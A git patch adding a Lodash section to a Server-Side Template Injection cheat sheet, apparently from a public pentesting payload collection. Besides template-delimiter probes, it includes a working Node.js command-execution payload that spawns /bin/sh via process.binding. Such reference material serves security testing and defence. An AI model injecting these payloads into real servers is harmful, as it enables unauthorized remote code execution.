From 34da0e270835da39b8577f488e1ea3f491053de4 Mon Sep 17 00:00:00 2001 From: 2h0ng <60600792+superboy-zjc@users.noreply.github.com> Date: Sat, 2 Sep 2023 21:24:59 -0400 Subject: [PATCH] Update Lodash SSTI Update Lodash SSTI --- Server Side Template Injection/README.md | 48 ++++++++++++++++++++++++ 1 file changed, 48 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 66d0219c..36af6926 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -56,6 +56,9 @@ - [Lessjs - SSRF / LFI](#lessjs---ssrf--lfi) - [Lessjs < v3 - Command Execution](#lessjs--v3---command-execution) - [Plugins](#plugins) + - [JavaScript - Lodash](#Lodash) + - [Lodash - Basic Injection](#Lodash---Basic-Injection) + - [Lodash - Command Execution](#Lodash---Command-Execution) - [Python - Mako](#mako) - [Direct access to os from TemplateNamespace:](#direct-access-to-os-from-templatenamespace) - [Java - Pebble](#pebble) @@ -743,6 +746,51 @@ registerPlugin({ --- +## Lodash + +[Official website](https://lodash.com/docs/4.17.15) + +### Lodash - Basic Injection + +How to create a template: + +```javascript +const _ = require('lodash'); +string = "{{= username}}" +const options = { + evaluate: /\{\{(.+?)\}\}/g, + interpolate: /\{\{=(.+?)\}\}/g, + escape: /\{\{-(.+?)\}\}/g, +}; + +_.template(string, options); +``` + +- **string:** The template string. +- **options.interpolate:** It is a regular expression that specifies the HTML *interpolate* delimiter. +- **options.evaluate:** It is a regular expression that specifies the HTML *evaluate* delimiter. +- **options.escape:** It is a regular expression that specifies the HTML *escape* delimiter. + +For the purpose of RCE, the delimiter of templates is determined by the **options.evaluate** parameter. + +```javascript +{{= _.VERSION}} +${= _.VERSION} +<%= _.VERSION %> + + +{{= _.templateSettings.evaluate }} +${= _.VERSION} +<%= _.VERSION %> + +``` + +### Lodash - Command Execution + +``` +{{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}} +``` + ## Mako [Official website](https://www.makotemplates.org/)